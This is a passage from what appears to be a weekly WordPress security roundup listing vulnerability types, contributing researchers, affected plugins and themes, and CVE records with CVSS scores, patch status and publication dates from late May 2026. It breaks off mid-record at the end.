Authentication Bypass by Alternate Name	1
External Control of File Name or Path	1
Improper Restriction of Excessive Authentication Attempts	1
Insufficient Verification of Data Authenticity	1
Missing Authentication for Critical Function	1
Server-Side Request Forgery (SSRF)	1
Uncontrolled Resource Consumption	1
URL Redirection to Untrusted Site (‘Open Redirect’)	1
Weak Password Recovery Mechanism for Forgotten Password	1

Researchers That Contributed to WordPress Security Last Week

Researcher Name	Number of Vulnerabilities
Bonds	35
Tran Nguyen Bao Khanh	28
Muhammad Yudha – DJ	16
João Pedro Soares de Alcântara	10
Gilang – DJ	9
MAJidox	9
dodoh4t	9
zakaria	7
afnaan	7
hhhai	7
daroo	6
timomangcut	6
Phat RiO	6
Legion Hunter	6
she11f	4
Osvaldo Noe Gonzalez Del Rio (Os)	4
Nabil Irawan	4
kai63001	4
0xd4rk5id3	4
Muhammad Nur Ibnu Hubab	4
san6051	4
Nguyen Ba Khanh	2
Supakiad S. (m3ez)	2
Dmitrii Ignatyev	2
Jack Pas (Dark.)	2
ZAST.AI	2
Athiwat Tiprasaharn (Jitlada)	2
Denver Jackson	2
johska	2
Louis Deschanel (JeanJeanLeHaxor)	2
Pascal SUN	2
ParkHyunWoo	2
lucky_buddy	2
Nguyen Ngoc Duc (duc193)	2
Osvaldo Noe Gonzalez Del Rio (Os) – krei.dev \| ogbuilders.io	2
mikemyers	2
0xzenko	2
Sarawut Poolkhet (MisterHelloz)	2
Naoya Takahashi (nakko)	1
NumeX	1
Kirasec	1
Steven Julian	1
Peter Thaleikis	1
theviper17	1
Chiao-Lin Yu (Steven Meow)	1
Long Lagon	1
stealthcopter	1
Benedictus Jovan (aillesiM)	1
Or Benit	1
Bao – BlueRock	1
HieuPenguin	1
theviper17y	1
a1batr0ss	1
Satoo Nakano	1
Muni Nitish Kumar Yaddala (Stranger825)	1
t0ann9uy3n	1
w1zard	1
darkmode	1
David Brown	1
Abu Hurayra (HurayraIIT)	1
Win3	1
Peng Zhou	1
devploit	1
John P	1
Drew Webber (mcdruid)	1
Ren Voza	1
Quốc Huy (jtwings)	1
Farrukh Ziyaev	1
lhking	1
ISMAILSHADOW	1
jamaal	1
SSL-6-s0d	1
Maurice Fielenbach (Hexastrike)	1
cuokon	1
Cyrille COQUARD	1
Irwan Kusuma	1
ammonia	1
Trương Hữu Phúc (truonghuuphuc)	1
Nguyen Quang Truong	1
ChuongVN	1
Tiago Ventura (perses)	1
Mateusz Gierblinski	1
davidfdzmorilla	1
Abdulsamad Yusuf (0xVenus)	1
Itthidej Aramsri (Boeing777)	1
Bas Albers	1
abrahack	1
type5afe	1
Ilay Striechman	1
Azril Fathoni (kiseki)	1
winrace	1
g0wthr	1
Dave Jong	1
bosz	1

WordPress Plugins with Reported Vulnerabilities Last Week

Software Name	Software Slug
3D Viewer – 3D Model Viewer – Augmented Reality – Virtual Try On	ar-vr-3d-model-try-on
a3 Lazy Load	a3-lazy-load
Accept Stripe Payments	stripe-payments
Admin Chat Management	admin-chat-box
Adminimize	adminimize
Advanced Custom Fields (ACF®)	advanced-custom-fields
Advanced Custom Fields: Extended	acf-extended
Advanced Custom Fields: Font Awesome Field	advanced-custom-fields-font-awesome
Advanced IP Blocker	advanced-ip-blocker
Affiliate Super Assistent	amazonsimpleadmin
affiliate-toolkit – Multi-Network Affiliate & Amazon Product Display	affiliate-toolkit-starter
AI Engine – The Chatbot, AI Framework & MCP for WordPress	ai-engine
Animate Your Content	animate-your-content
Animation Addons for Elementor – GSAP Motion Elementor Addons & Website Templates	animation-addons-for-elementor
Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin	simply-schedule-appointments
Appointment Booking Plugin for WooCommerce – WpBookingly \| All-in-One Service Manager	service-booking-manager
Auto Affiliate Links	wp-auto-affiliate-links
auto making JSON-LD	auto-making-json-ld
Auto Thumbnails	automatic-thumbnail
Autoship Cloud for WooCommerce Subscription Products	autoship-cloud
B2BKing — Ultimate WooCommerce B2B and Wholesale Plugin — Wholesale Prices, Bulk Order Form & More	b2bking-wholesale-for-woocommerce
Better Messages – Chat Rooms, Group Chat, Private Messages & AI Chat Bots	bp-better-messages
BitForm – Data management solution for WordPress	bitform
Booking Manager – Sync WP Booking Calendar – Import Events, Export Bookings to ICS Calendar	booking-manager
Breeze Cache	breeze
Broadcast Live Video – Live Streaming : WebRTC, HLS, RTSP, RTMP	videowhisper-live-streaming-integration
CDN Linker lite	ossdl-cdn-off-linker
cformsII	cforms2
CloudSecure WP Security	cloudsecure-wp-security
CM Ad Changer – A simple tool to control and optimize your site’s banners	cm-ad-changer
Contact Form 7 – PayPal & Stripe Add-on	contact-form-7-paypal-add-on
Content Slideshow	content-slideshow
Crawlomatic Multipage Scraper Post Generator	crawlomatic-multipage-scraper-post-generator
Cryptocurrency Prijsvergelijking Widget	cryptocurrency-prijsvergelijking-widget
DearFlip – PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer	3d-flipbook-dflip-lite
Dideo	wp-dideo
Disable Comments & Delete All Comments	comments-plus
Duplicate Page and Post	duplicate-wp-page-post
E-cab Taxi Booking Manager for Woocommerce	ecab-taxi-booking-manager
Easy Digital Downloads – eCommerce Payments and Subscriptions made easy	easy-digital-downloads
Easy Form Builder by WhiteStudio — Drag & Drop Form Builder	easy-form-builder
Easy Prism Syntax Highlighter	easy-prism-syntax-highlighter
Easy Updates Manager	stops-core-theme-and-plugin-updates
ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor	elementskit-lite
Enable jQuery Migrate Helper	enable-jquery-migrate-helper
Endless Scroll	endless-scroll
EnvíaloSimple: Email Marketing y Newsletters	envialosimple-email-marketing-y-newsletters-gratis
Equalize Digital Accessibility Checker – WCAG, ADA, EAA and Section 508 compliance	accessibility-checker
Event Booking Manager for WooCommerce	mage-eventpress
EventPrime – Events Calendar, Bookings and Tickets	eventprime-event-calendar-management
Events In City	events-in-city
Events Schedule – WordPress Events Calendar Plugin	weekly-class
Everest Forms – Contact Form, Payment Form, Quiz, Survey & Custom Form Builder	everest-forms
Export WordPress Pages to Static HTML & PDF — Static Site Export	export-wp-page-to-static-html
faq shortocde	faq-shortcode
Favicon by RealFaviconGenerator	favicon-by-realfavicongenerator
Feeds for TikTok – Display Video Feeds in Grid Layouts	b-tiktok-feed
Felan Framework	felan-framework
FlexTable – Data Table Sync with Google Sheets	sheets-to-wp-table-live-sync
Formidable Kinetic	formidable-kinetic
FOX – Currency Switcher Professional for WooCommerce	woocommerce-currency-switcher
Frontend Admin by DynamiApps	acf-frontend-form-element
GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress	gamipress
GBI To Print	gbi-to-print
GenerateBlocks	generateblocks
Genzel breadcrumbs	genzel-breadcrumbs
Geo Mashup	geo-mashup
GEO my WP	geo-my-wp
Github Shortcode	github-shortcode
GNTT Post Title Ticker	gntt-post-title-ticker
Google+ Link Name	google-plus-name-link-popup-badge
GoStats for WordPress	gostats-for-wordpress
GutenBee – Gutenberg Blocks	gutenbee
Gutenverse – WordPress Blocks, Page Builder & Site Editor	gutenverse
hk_shortcode	hk-shortcode
HT Contact Form – Drag & Drop Form Builder for WordPress	ht-contactform
Independent Analytics – WordPress Analytics Plugin	independent-analytics
Instant-Quote.co Quotation Page	iq-quotation-page
Islamic Database	islamic-database
iWR Tooltip	iwr-tooltip
jQuery googleslides	jquery-googleslides
KiviCare – Clinic & Patient Management System (EHR)	kivicare-clinic-management-system
Link Whisper Free	link-whisper
Listen Shortcode	listen-shortcode
LiteSpeed Cache	litespeed-cache
Livemesh Addons for Beaver Builder	addons-for-beaver-builder
Livemesh SiteOrigin Widgets	livemesh-siteorigin-widgets
LiveSmart Video Chat Live Video Chat	new-dev-livesmart-video-chat
Login No Captcha reCAPTCHA	login-recaptcha
Login with NEAR	near-login
Login with OTP	otp-login
Master Slider – Responsive Touch Slider	master-slider
Masteriyo LMS – LMS Course Builder, Quizzes & Certificates	learning-management-system
Mayosis Core	mayosis-core
Media Library Assistant	media-library-assistant
Meta Field Block – Display custom fields in the Block Editor without coding	display-a-meta-field-as-block
Meta for WooCommerce	facebook-for-woocommerce
MetaMagic SEO Plugin	metamagic
MinhNhut Link Gateway	minhnhut-link-gateway
Modula Image Gallery – Photo Grid & Video Gallery	modula-best-grid-gallery
Mutual Funds Data	mutual-funds-data
My Email Shortcode	my-email-shortcode
myLinksDump	mylinksdump
Ninja Forms Views – Display & Edit Ninja Forms Submissions on your site frontend	views-for-ninja-forms
NS Product icon badge	product-icon-badge
Old Posts Highlighter	old-posts-highlighter
Organization chart	organization-chart
OTP Login With Phone Number, OTP Verification	login-with-phone-number
Paid Videochat Turnkey Site – HTML5 PPV Live Webcams	ppv-live-webcams
PDF Embedder	pdf-embedder
PeachPay — Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net, NMI)	peachpay-for-woocommerce
Photo Gallery by 10Web – Mobile-Friendly Image Gallery	photo-gallery
Poll Maker by AYS – Versus Polls, Anonymous Polls, Image Polls	poll-maker
Post Categories Gallery	post-category-gallery
Post SMTP – Complete Email Deliverability and SMTP Solution with Email Logs, Alerts, Backup SMTP & Mobile App	post-smtp
Post Snippets – Custom WordPress Code Snippets Customizer	post-snippets
Product Import Export for WooCommerce – Import Export Product CSV Suite	product-import-export-for-woo
QR Redirector	qr-redirector
Quads Ads Manager for Google AdSense	quick-adsense-reloaded
Query Shortcode	query-shortcode
Rank Math SEO – AI SEO Tools to Dominate SEO Rankings	seo-by-rank-math
Realtyna Organic IDX plugin + WPL Real Estate	real-estate-listing-realtyna-wpl
RepairBuddy – Repair Shop CRM & Booking Plugin for WordPress	computer-repair-shop
Responsive Check	responsive-checker-real-time
Responsive Video Embedder	responsive-video-embedder
rexCrawler	rexcrawler
RSVP and Event Management	rsvp
Search Analytics for WP	search-analytics
Search Simple Fields	search-simple-fields
SeedProd Pro	seedprod-coming-soon-pro-5
SePay Gateway	sepay-gateway
Shariff Wrapper	shariff
ShopLentor – All-in-One WooCommerce Growth & Store Enhancement Plugin	woolentor-addons
Shortcode Buddy	shortcode-buddy
Simple Divi Shortcode	simple-divi-shortcode
Simple History – Track, Log, and Audit WordPress Changes	simple-history
Single Mailchimp	single-mailchimp
SlimStat Analytics	wp-slimstat
Smart Online Order for Clover	clover-online-orders
SMTP2GO for WordPress – Email Made Easy	smtp2go
Spectra Gutenberg Blocks – Website Builder for the Block Editor	ultimate-addons-for-gutenberg
Splide Carousel Block	splide-carousel
StatCounter – Free Real Time Visitor Stats	official-statcounter-plugin-for-wordpress
Style Kits for Elementor	analogwp-templates
Subscription & Recurring Payment for WooCommerce	subscription
Sunshine Photo Cart – Client Photo Gallery & Photo Proofing for Photographers	sunshine-photo-cart
Support Ticket Management System for WordPress	support_ticket
SVG Support	svg-support
sw_core	sw_core
Sweet Date Core	sweetdate-core
TableOn – WordPress Posts Table Filterable	posts-table-filterable
Tainacan	tainacan
Team Master – A Modern WordPress Team Showcase	team-master
Team Showcase	team
The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce	the-plus-addons-for-elementor-page-builder
The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid	the-post-grid
Timetable and Event Schedule by MotoPress	mp-timetable
Travelly – Tour & Travel Booking Manager for WooCommerce \| Tour & Hotel Booking Solution	tour-booking-manager
Tuxquote	tuxquote
Two-factor authentication (formerly IP Vault)	ip-vault-wp-firewall
Unlimited Elements For Elementor	unlimited-elements-for-elementor
User Registration & Membership – Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder	user-registration
Views for WPForms – Display & Edit WPForms Entries on your site frontend	views-for-wpforms-lite
VikBooking Hotel Booking Engine & PMS	vikbooking
Visualizer: Tables and Charts Manager for WordPress	visualizer
WCFM Membership – WooCommerce Memberships for Multivendor Marketplace	wc-multivendor-membership
WebinarIgnition – Live, Automated & Evergreen Webinar System also for WooCommerce	webinar-ignition
Woocommerce Envato Affiliates	wooenvato
WooCommerce Infinite Scroll and Ajax Pagination	sb-woocommerce-infinite-scrol
WP AutoBuzz	wp-autobuzz
WP Contact Form 7 DB Handler	wp-contact-form-7-db-handler
WP Iframe Geo Style for Amazon affiliates	wp-iframe-geo-style-for-amazon-affiliates
WP Maps Pro	wp-google-map-gold
WP Meta and Date Remover	wp-meta-and-date-remover
WP Promoter	wp-promoter
WP Travel Pro	wp-travel-pro
WPBakery Page Builder Addons by Livemesh	addons-for-visual-composer
WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager	insert-headers-and-footers
WPComplete	wpcomplete
WPCS – WordPress Currency Switcher Professional	currency-switcher
WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More	wpforms-lite
WPify Woo – Withdrawal, CRN/VAT, QR payments, Heureka and more for WooCommerce	wpify-woo
Xpro Elementor Addons – Pro	xpro-elementor-addons-pro
Yoast SEO – Advanced SEO with real-time guidance and built-in AI	wordpress-seo

WordPress Themes with Reported Vulnerabilities Last Week

Software Name	Software Slug
Abelle	abelle
AirSupply \| Conditioning Company and Heating Services WordPress Theme + RTL	air-supply
Automotive Car Dealership Business WordPress Theme	automotive
Brikk – Directory & Listing WordPress Theme	brikk
CarZone – A Complete Car Dealer HTML Wire-Frame	carzone
Choreo	choreo
Confidant – Startup & Consulting Services WordPress Theme	confidant
CopyPress	copypress
Corbesier	corbesier
Crafti – Handmade Store WordPress Theme	crafti
Dazzle – Manufacturing & Factory Elementor Pro template Kit	dazzle
Deliciosa	deliciosa
Dom	dom
Entrepreneur – Booking for Small Businesses WordPress Theme	entrepreneurx
Eros	eros
Especio – Food Blog Elementor Pro Template Kit	especio
Etude – Design Agency & Branding Agency WordPress Theme	etude
Eventicity	eventicity
Fermentio — Brewery and Winemaking Restaurant WordPress Theme	fermentio
Food Drop \| Meal Ordering & Delivery Mobile App WordPress Theme	food-drop
Fortius	fortius
Gamic – Gaming Metaverse Game & Crypto WordPress Theme	gamic
Gat	gat
Genemy – Creative Minimal Landing Page Builder for Digital Startup Design Studio Agency in Marketing	genemy
Geya – Renewable Energy & Ecology WordPress Theme	geya
Gita	gita
Grand Car Rental \| Limousine HTML Template	grandcarrental
Granola – SEO & Marketing Agency WordPress Theme	granola
Grecko \| Business WordPress Theme	grecko
Gunslinger	gunslinger
Home Health Care, Medical Care WordPress Theme – NanoCare	nanocare
Hot Coffee \| Coffee Shop & Cafe WordPress Theme	hot-coffee
Imba	imba
Ingenioso	ingenioso
Iona – Handmade & Crafts Shop WordPress Theme	iona
ITactics – IT Solutions & Digital Startup WordPress Theme + AI	itactics
JobCareer	jobcareer
Kelly Young	kelly-young
Line Agency \| Interior Design & Architecture WordPress Theme	lineagency
LuxMed \| Medicine & Healthcare Doctor WordPress Theme	luxmed
MaxiNet – Internet & IPTV Provider Elementor Template Kit	maxinet
Medeus	medeus
Mission	mission
Modernee	modernee
Newses	newses
Nexio	nexio
Nyla – A Fresh & Modern WooCommerce Theme	nyla
Orpheus	orpheus
Planty	planty
Plumbing – Plumber and Handyman WordPress Theme	plumbing-parts
Preservation	preservation
Printo	printo
Putter	putter
Qreatix – Interactive Portfolio WordPress Theme	qreatix
quirky	quirky
Reisen \| Auto Store & Car Repair WordPress Theme	reisen
Resurs – Physiotherapy & Psychology Rehabilitation WordPress Theme	resurs
Roneous – Creative Multi-Purpose WordPress Theme	roneous
Rosaleen	rosaleen
SeaFood Company – Fish Restaurant WordPress Theme	seafood-company
Skyward	skyward
Snow Club \| Ski Resort and Snowboard Classes WordPress Theme	snow-club
snowy	snowy
Spike – Volleyball Sports WordPress Theme	spike
Spin – Cricket Team Sports WordPress Theme + AI	spin
tipsy	tipsy
Top Dog	top-dog
Truemag	truemag
Wanium – A Elegant Multi-Concept Theme	wanium
WineShop – Food & Wine Store WordPress Theme	wineshop

Vulnerability Details

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-8809

Patch Status
Patched

Published
May 28, 2026

Affected Software

Advanced Custom Fields: Extended [acf-extended]

Researcher

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-8760

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Researcher

Irwan Kusuma

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-3655

Patch Status
Patched

Published
May 28, 2026

Affected Software

OTP Login With Phone Number, OTP Verification [login-with-phone-number]

Researcher

lucky_buddy

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2025-69179

Patch Status
Unpatched

Published
May 28, 2026

Affected Software

Support Ticket Management System for WordPress [support_ticket]

Researcher

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-42758

Patch Status
Patched

Published
May 30, 2026

Affected Software

WebinarIgnition – Live, Automated & Evergreen Webinar System also for WooCommerce [webinar-ignition]

Researcher

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-8732

Patch Status
Patched

Published
May 28, 2026

Affected Software

WP Maps Pro [wp-google-map-gold]

Researcher

David Brown

CVSS Rating
9.1 (Critical)

CVE-ID

CVE-2025-69139

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

CarZone – A Complete Car Dealer HTML Wire-Frame [carzone]

Researcher

CVSS Rating
9.1 (Critical)

Patch Status
Patched

Published
May 27, 2026

Affected Software

GEO my WP [geo-my-wp]

Researcher(s): Unknown

CVSS Rating
9.1 (Critical)

CVE-ID

CVE-2026-42737

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

VikBooking Hotel Booking Engine & PMS [vikbooking]

Researcher

CVSS Rating
9.1 (Critical)

CVE-ID

CVE-2026-4290

Patch Status
Unpatched

Published
May 28, 2026

Affected Software

WP Travel Pro [wp-travel-pro]

Researcher

Ren Voza

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-9009

Patch Status
Patched

Published
May 27, 2026

Affected Software

Crawlomatic Multipage Scraper Post Generator [crawlomatic-multipage-scraper-post-generator]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-8787

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Admin Chat Management [admin-chat-box]

Researcher

Farrukh Ziyaev

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-7802

Patch Status
Patched

Published
May 27, 2026

Affected Software

Frontend Admin by DynamiApps [acf-frontend-form-element]

Researcher

Tiago Ventura (perses)

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-6226

Patch Status
Patched

Published
May 27, 2026

Affected Software

Frontend Admin by DynamiApps [acf-frontend-form-element]

Researcher

Genemy – Creative Minimal Landing Page Builder for Digital Startup Design Studio Agency in Marketing [genemy]

CVSS Rating
8.8 (High)

CVE-ID

CVE-2025-69138

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-9227

Patch Status
Patched

Published
May 27, 2026

Affected Software

GutenBee – Gutenberg Blocks [gutenbee]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-7465

Patch Status
Patched

Published
May 29, 2026

Affected Software

Spectra Gutenberg Blocks – Website Builder for the Block Editor [ultimate-addons-for-gutenberg]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2025-11993

Patch Status
Unpatched

Published
May 28, 2026

Affected Software

WooCommerce Infinite Scroll and Ajax Pagination [sb-woocommerce-infinite-scrol]

Researcher

cuokon

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-8832

Patch Status
Patched

Published
May 26, 2026

Affected Software

WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager [insert-headers-and-footers]

Researcher

Win3

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-42748

Patch Status
Patched

Published
May 29, 2026

Affected Software

WPify Woo – Withdrawal, CRN/VAT, QR payments, Heureka and more for WooCommerce [wpify-woo]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69142

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Abelle [abelle]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69110

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

AirSupply | Conditioning Company and Heating Services WordPress Theme + RTL [air-supply]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-27053

Patch Status
Patched

Published
May 28, 2026

Affected Software

Broadcast Live Video – Live Streaming : WebRTC, HLS, RTSP, RTMP [videowhisper-live-streaming-integration]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69165

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Choreo [choreo]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-53440

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Confidant – Startup & Consulting Services WordPress Theme [confidant]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69118

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

CopyPress [copypress]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69119

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Corbesier [corbesier]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-58705

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Crafti – Handmade Store WordPress Theme [crafti]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69120

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Dazzle – Manufacturing & Factory Elementor Pro template Kit [dazzle]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69121

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Deliciosa [deliciosa]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69146

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Dom [dom]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69167

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Eros [eros]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69124

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Especio – Food Blog Elementor Pro Template Kit [especio]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69174

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Etude – Design Agency & Branding Agency WordPress Theme [etude]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69170

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Eventicity [eventicity]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-42687

Patch Status
Patched

Published
May 25, 2026

Affected Software

EventPrime – Events Calendar, Bookings and Tickets [eventprime-event-calendar-management]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-58897

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Fermentio — Brewery and Winemaking Restaurant WordPress Theme [fermentio]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69125

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Food Drop | Meal Ordering & Delivery Mobile App WordPress Theme [food-drop]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69126

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Fortius [fortius]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69157

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Gamic – Gaming Metaverse Game & Crypto WordPress Theme [gamic]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69145

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Gat [gat]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-58924

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Geya – Renewable Energy & Ecology WordPress Theme [geya]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69160

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Gita [gita]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69158

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Granola – SEO & Marketing Agency WordPress Theme [granola]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69162

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Grecko | Business WordPress Theme [grecko]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69166

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Gunslinger [gunslinger]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69108

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Hot Coffee | Coffee Shop & Cafe WordPress Theme [hot-coffee]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69106

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Imba [imba]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69117

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Ingenioso [ingenioso]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69116

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Iona – Handmade & Crafts Shop WordPress Theme [iona]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69176

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

ITactics – IT Solutions & Digital Startup WordPress Theme + AI [itactics]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69141

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Kelly Young [kelly-young]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69175

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Line Agency | Interior Design & Architecture WordPress Theme [lineagency]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-8994

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Researcher

g0wthr

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69115

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

LuxMed | Medicine & Healthcare Doctor WordPress Theme [luxmed]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69114

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

MaxiNet – Internet & IPTV Provider Elementor Template Kit [maxinet]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69150

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Medeus [medeus]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-6075

Patch Status
Patched

Published
May 28, 2026

Affected Software

Media Library Assistant [media-library-assistant]

Researcher

Jack Pas (Dark.)

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69143

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Mission [mission]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69105

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Modernee [modernee]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69113

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Nexio [nexio]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69171

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Orpheus [orpheus]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-27333

Patch Status
Patched

Published
May 28, 2026

Affected Software

Paid Videochat Turnkey Site – HTML5 PPV Live Webcams [ppv-live-webcams]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69112

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Planty [planty]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69127

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Plumbing – Plumber and Handyman WordPress Theme [plumbing-parts]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69144

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Preservation [preservation]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69159

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Printo [printo]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69147

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Putter [putter]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69148

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

quirky [quirky]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69111

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Reisen | Auto Store & Car Repair WordPress Theme [reisen]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69172

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Resurs – Physiotherapy & Psychology Rehabilitation WordPress Theme [resurs]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69177

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Roneous – Creative Multi-Purpose WordPress Theme [roneous]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69107

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Rosaleen [rosaleen]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69122

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

SeaFood Company – Fish Restaurant WordPress Theme [seafood-company]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69164

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Skyward [skyward]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69123

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Snow Club | Ski Resort and Snowboard Classes WordPress Theme [snow-club]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69161

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

snowy [snowy]

Researcher

CVSS Rating
